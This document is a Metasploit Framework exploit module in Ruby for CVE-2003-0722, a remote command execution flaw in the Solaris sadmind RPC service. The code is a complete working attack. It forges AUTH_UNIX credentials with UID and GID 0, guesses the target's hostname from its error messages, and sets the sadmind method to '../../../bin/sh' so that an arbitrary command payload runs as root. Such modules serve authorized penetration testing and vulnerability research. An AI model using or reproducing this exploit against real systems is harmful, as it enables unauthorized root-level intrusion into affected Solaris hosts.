Solaris sadmind Command Execution

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
  
include Msf::Exploit::Remote::SunRPC  
  
def initialize(info = {})  
super(update_info(info,   
'Name' => 'Solaris sadmind Command Execution',  
'Description' => %q{  
This exploit targets a weakness in the default security  
settings of the sadmind RPC application. This server is  
installed and enabled by default on most versions of the  
Solaris operating system.  
  
Vulnerable systems include solaris 2.7, 8, and 9  
},  
'Author' => [ 'vlad902 <[email protected]>', 'hdm', 'cazz' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision$',  
'References' =>  
[  
['CVE', '2003-0722'],  
['OSVDB', '4585'],  
['BID', '8615'],  
['URL', 'http://lists.insecure.org/lists/vulnwatch/2003/Jul-Sep/0115.html'],  
],  
'Privileged' => true,  
'Platform' => ['unix', 'solaris'],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 2000,  
'BadChars' => "\x00",  
'DisableNops' => true,  
'Compat' =>  
{  
'PayloadType' => 'cmd',  
'RequiredCmd' => 'generic perl telnet',  
}  
},  
'Targets' => [ ['Automatic', { }], ],  
'DisclosureDate' => 'Sep 13 2003',  
'DefaultTarget' => 0  
))  
  
register_options(  
[  
OptString.new('HOSTNAME', [false, 'Remote hostname', nil]),  
OptInt.new('GID', [false, 'GID to emulate', 0]),  
OptInt.new('UID', [false, 'UID to emulate', 0])  
], self.class  
)  
end  
  
def exploit  
sunrpc_create('udp', 100232, 10)  
sunrpc_authunix('localhost', datastore['UID'], datastore['GID'], [])  
  
if !datastore['HOSTNAME']  
print_status('attempting to determine hostname')  
response = sadmind_request(rand_text_alpha(rand(10) + 1), "true")  
  
if !response  
print_error('no response')  
return  
end  
  
match = /Security exception on host (.*)\. USER/.match(response)  
if match  
hostname = match.captures[0]  
print_status("found hostname: #{hostname}")  
else  
print_error('unable to determine hostname')  
return  
end  
else  
hostname = datastore['HOSTNAME']  
end  
  
response = sadmind_request(hostname, payload.encoded)  
sunrpc_destroy  
  
if /Security exception on host/.match(response)  
print_error('exploit failed')  
return  
else  
print_good('exploit did not give us an error, this is good...')  
sleep(1)  
handler  
end  
end  
  
def sadmind_request(host, command)  
header =  
XDR.encode(0) * 7 +  
XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, \  
4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, \  
host, 'system', '../../../bin/sh')  
  
body =  
do_int('ADM_FW_VERSION', 1) +  
do_string('ADM_LANG', 'C') +  
do_string('ADM_REQUESTID', '00009:000000000:0') +  
do_string('ADM_CLASS', 'system') +  
do_string('ADM_CLASS_VERS', '2.1') +  
do_string('ADM_METHOD', '../../../bin/sh') +  
do_string('ADM_HOST', host) +  
do_string('ADM_CLIENT_HOST', host) +  
do_string('ADM_CLIENT_DOMAIN', '') +  
do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') +  
do_int('ADM_FENCE', 0) +  
do_string('X', '-c') +  
do_string('Y', command) +  
XDR.encode('netmgt_endofargs')  
  
request = header + XDR.encode(header.length + body.length - 326) + body  
  
ret = sunrpc_call(1, request)  
return XDR.decode!(ret, Integer, Integer, String)[2]  
end   
  
def do_string(str1, str2)  
XDR.encode(str1, 9, str2.length + 1, str2, 0, 0)  
end  
  
def do_int(str, int)  
XDR.encode(str, 3, 4, int, 0, 0)  
end  
end  
  
`